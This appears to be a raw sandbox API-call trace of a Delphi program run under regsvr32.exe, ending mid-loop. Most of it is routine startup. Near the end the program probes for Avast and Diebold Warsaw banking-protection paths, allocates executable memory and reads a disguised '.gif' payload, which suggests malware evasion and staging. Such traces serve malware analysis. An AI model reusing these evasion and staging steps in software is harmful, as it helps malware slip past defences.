[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0xee10c, cchData=256 | out: lpLCData="0") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0xee10c, cchData=256 | out: lpLCData="0") returned 2
[0086.132] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0xee10c, cchData=256 | out: lpLCData="0") returned 2
[0086.132] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0xee204, cchData=2 | out: lpLCData=",") returned 2
[0086.132] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0086.132] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0086.132] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0086.132] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0086.132] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0086.132] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0086.132] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0086.132] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0086.132] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0086.133] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0086.134] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0086.134] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0086.134] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0086.134] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xd8
[0086.134] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xdc
[0086.134] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe0
[0086.134] GetDC (hWnd=0x0) returned 0x2b010799
[0086.134] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0086.134] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.134] GetDC (hWnd=0x0) returned 0x2b010799
[0086.134] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0086.134] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.134] CreatePalette (plpal=0xede68) returned 0x3308027e
[0086.135] GetStockObject (i=7) returned 0x1b00017
[0086.135] GetStockObject (i=5) returned 0x1900015
[0086.135] GetStockObject (i=13) returned 0x18a002e
[0086.135] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0086.135] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0086.135] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff4c, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff4b, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff4a, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff49, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff48, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff47, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff46, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff45, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff44, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff43, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff42, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff41, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff40, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0086.135] LoadStringA (in: hInstance=0x160000, uID=0xff5f, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff5e, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff5d, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff5c, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff5b, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff05, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff04, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff03, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff02, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff01, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff00, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff1f, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff1e, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff1d, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff1c, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0086.136] LoadStringA (in: hInstance=0x160000, uID=0xff1b, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0086.152] LoadStringA (in: hInstance=0x160000, uID=0xff1a, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0086.152] LoadStringA (in: hInstance=0x160000, uID=0xff19, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0086.152] LoadStringA (in: hInstance=0x160000, uID=0xff18, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff17, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff16, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff15, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff14, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff13, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff12, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff11, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff10, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff2f, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff2e, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff2d, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff2c, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff2b, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff2a, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff29, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff28, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff27, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff26, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff25, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff24, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff23, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff22, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff21, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff20, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff3f, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff3e, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0086.153] LoadStringA (in: hInstance=0x160000, uID=0xff3d, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0086.154] LoadStringA (in: hInstance=0x160000, uID=0xff3c, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0086.154] LoadStringA (in: hInstance=0x160000, uID=0xff3b, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0086.154] LoadStringA (in: hInstance=0x160000, uID=0xff3a, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0086.154] LoadStringA (in: hInstance=0x160000, uID=0xff39, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0086.154] LoadStringA (in: hInstance=0x160000, uID=0xff38, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0086.154] LoadStringA (in: hInstance=0x160000, uID=0xff37, lpBuffer=0xede64, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0086.154] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0086.154] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0086.154] GetVersion () returned 0x1db10106
[0086.154] GetCurrentProcessId () returned 0xf0c
[0086.154] GlobalAddAtomA (lpString="Delphi00000F0C") returned 0xc15d
[0086.154] GetCurrentThreadId () returned 0xf10
[0086.154] GlobalAddAtomA (lpString="ControlOfs0016000000000F10") returned 0xc15c
[0086.154] RegisterClipboardFormatA (lpszFormat="ControlOfs0016000000000F10") returned 0xc15b
[0086.154] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0086.154] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0086.155] GetSystemMetrics (nIndex=19) returned 1
[0086.155] GetSystemMetrics (nIndex=75) returned 1
[0086.155] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1791310, fWinIni=0x0 | out: pvParam=0x1791310) returned 1
[0086.155] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0086.155] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0086.155] LoadCursorA (hInstance=0x160000, lpCursorName=0x7ff9) returned 0x20199
[0086.155] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0086.155] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0086.155] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0086.155] LoadCursorA (hInstance=0x160000, lpCursorName=0x7ffa) returned 0x2019f
[0086.156] LoadCursorA (hInstance=0x160000, lpCursorName=0x7ffb) returned 0x300f5
[0086.156] LoadCursorA (hInstance=0x160000, lpCursorName=0x7ffc) returned 0x2019b
[0086.156] LoadCursorA (hInstance=0x160000, lpCursorName=0x7ffd) returned 0x301a3
[0086.156] LoadCursorA (hInstance=0x160000, lpCursorName=0x7fff) returned 0x201a1
[0086.156] LoadCursorA (hInstance=0x160000, lpCursorName=0x7ffe) returned 0x101a5
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0086.157] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0086.157] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0086.157] GetDC (hWnd=0x0) returned 0x2b010799
[0086.157] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0086.157] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.157] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0086.157] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x1a4e68, dwData=0x179155c) returned 1
[0086.158] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0xee1cf, fWinIni=0x0 | out: pvParam=0xee1cf) returned 1
[0086.158] CreateFontIndirectA (lplf=0xee1cf) returned 0x130a0717
[0086.158] GetObjectA (in: h=0x130a0717, c=60, pv=0xedfc0 | out: pv=0xedfc0) returned 60
[0086.158] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0xee07b, fWinIni=0x0 | out: pvParam=0xee07b) returned 1
[0086.158] CreateFontIndirectA (lplf=0xee157) returned 0x120a0723
[0086.158] GetObjectA (in: h=0x120a0723, c=60, pv=0xedfc0 | out: pv=0xedfc0) returned 60
[0086.158] CreateFontIndirectA (lplf=0xee11b) returned 0x100a071c
[0086.158] GetObjectA (in: h=0x100a071c, c=60, pv=0xedfc0 | out: pv=0xedfc0) returned 60
[0086.158] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0086.159] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee12f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0086.159] OemToCharA (in: pSrc="C:\\Windows\\System32\\regsvr32.exe", pDst=0xee12f | out: pDst="C:\\Windows\\System32\\regsvr32.exe") returned 1
[0086.159] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x90000
[0086.160] GetKeyboardLayoutList (in: nBuff=64, lpList=0xee0b0 | out: lpList=0xee0b0) returned 1
[0086.161] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0086.161] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0086.161] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x73e90000
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="InitializeFlatSB") returned 0x73f6f803
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="UninitializeFlatSB") returned 0x73e9d1ea
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_GetScrollProp") returned 0x73f6f81f
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_SetScrollProp") returned 0x73f107d0
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_EnableScrollBar") returned 0x73f6f84b
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_ShowScrollBar") returned 0x73f6f83a
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_GetScrollRange") returned 0x73f6f829
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_GetScrollInfo") returned 0x73f108b6
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_GetScrollPos") returned 0x73f6f80e
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_SetScrollPos") returned 0x73f10894
[0086.162] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_SetScrollInfo") returned 0x73f108c7
[0086.163] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_SetScrollRange") returned 0x73f108a5
[0086.163] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0086.163] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0086.163] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0086.163] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0086.163] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0086.163] GetCurrentThreadId () returned 0xf10
[0086.163] GlobalAddAtomA (lpString="WndProcPtr0016000000000F10") returned 0xc15b
[0086.163] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0086.164] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0086.164] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0086.164] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0086.164] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4
[0086.164] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0086.164] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0086.164] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0086.164] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0086.167] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0086.167] ReadFile (in: hFile=0xe4, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0086.176] CloseHandle (hObject=0xe4) returned 1
[0086.177] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.177] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.177] GlobalUnlock (hMem=0x189000c) returned 0
[0086.178] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0086.178] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.179] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.179] GlobalUnlock (hMem=0x189000c) returned 0
[0086.179] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0086.179] GlobalLock (hMem=0x189000c) returned 0x25f110
[0086.180] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0086.180] GlobalUnlock (hMem=0x189000c) returned 0
[0086.180] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0086.181] GlobalLock (hMem=0x189000c) returned 0x265120
[0086.182] GlobalHandle (pMem=0x265120) returned 0x189000c
[0086.182] GlobalUnlock (hMem=0x189000c) returned 0
[0086.182] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0086.182] GlobalLock (hMem=0x189000c) returned 0x265120
[0086.183] GlobalHandle (pMem=0x265120) returned 0x189000c
[0086.183] GlobalUnlock (hMem=0x189000c) returned 0
[0086.183] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0086.184] GlobalLock (hMem=0x189000c) returned 0x26f130
[0086.185] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0086.185] GlobalUnlock (hMem=0x189000c) returned 0
[0086.185] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0086.185] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.186] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.186] GlobalUnlock (hMem=0x189000c) returned 0
[0086.186] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0086.186] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.187] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.187] GlobalUnlock (hMem=0x189000c) returned 0
[0086.187] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0086.187] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.187] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.187] GlobalUnlock (hMem=0x189000c) returned 0
[0086.188] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0086.188] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.188] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.188] GlobalUnlock (hMem=0x189000c) returned 0
[0086.188] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0086.188] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.189] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.189] GlobalUnlock (hMem=0x189000c) returned 0
[0086.189] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0086.189] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.190] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.190] GlobalUnlock (hMem=0x189000c) returned 0
[0086.190] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0086.190] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.191] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.191] GlobalUnlock (hMem=0x189000c) returned 0
[0086.191] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0086.191] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.192] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.192] GlobalUnlock (hMem=0x189000c) returned 0
[0086.192] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0086.192] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.193] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.193] GlobalUnlock (hMem=0x189000c) returned 0
[0086.193] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0086.193] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.194] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.194] GlobalUnlock (hMem=0x189000c) returned 0
[0086.194] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0086.196] GlobalLock (hMem=0x189000c) returned 0x27b110
[0086.197] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0086.197] GlobalUnlock (hMem=0x189000c) returned 0
[0086.197] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0086.197] GlobalLock (hMem=0x189000c) returned 0x27b110
[0086.198] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0086.198] GlobalUnlock (hMem=0x189000c) returned 0
[0086.198] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0086.232] GlobalLock (hMem=0x189000c) returned 0x29f120
[0086.233] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0086.233] GlobalUnlock (hMem=0x189000c) returned 0
[0086.233] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0086.233] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.234] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.234] GlobalUnlock (hMem=0x189000c) returned 0
[0086.234] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0086.234] GlobalLock (hMem=0x189000c) returned 0x25b100
